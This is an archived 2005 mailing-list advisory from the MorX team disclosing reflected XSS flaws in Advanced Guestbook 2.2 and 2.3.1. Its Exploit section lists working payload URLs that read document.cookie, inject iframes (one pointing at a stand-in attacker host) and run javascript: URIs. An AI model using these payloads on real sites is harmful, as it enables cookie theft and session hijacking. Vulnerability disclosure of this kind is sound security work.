| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200512252252.07098.handrix@morx.org>
Date: Sun Dec 25 21:58:09 2005
From: handrix at morx.org (handrix@...x.org)
Subject: Advanced Guestbook remote XSS exploit
Advanced Guestbook 2.2 and 2.3.1 and possibly other versions
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
16 December 2005
MorX security research team
www.morx.org
Description:
Advanced Guestbook is a PHP-based guestbook script.
index.php and comment.php scripts are vulnerable to XSS attacks. This issue
can allow an attacker
to bypass content filters and potentially carry out cross-site scripting, HTML
injection and other
attacks.
Exploit:
http://www.example.com/guestbook/index.php?entry=<script>alert(document.cookie);</script>
http://www.example.com/guestbook/index.php?entry=<iframe
src=http://www.attackersite.com/>
http://www.example.com/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script>
http://www.example.com/guestbook/comment.php?gb_id=1<IFRAME
SRC="javascript:alert('XSS');"></IFRAME>
Vulnerable versions :
Advanced Guestbook 2.2
Advanced Guestbook 2.3.1
___________________________________________________________________________
Nouveau : téléphonez moins cher avec Yahoo! Messenger ! Découvez les tarifs exceptionnels pour appeler la France et l'international.
Téléchargez sur http://fr.messenger.yahoo.com
Powered by blists - more mailing lists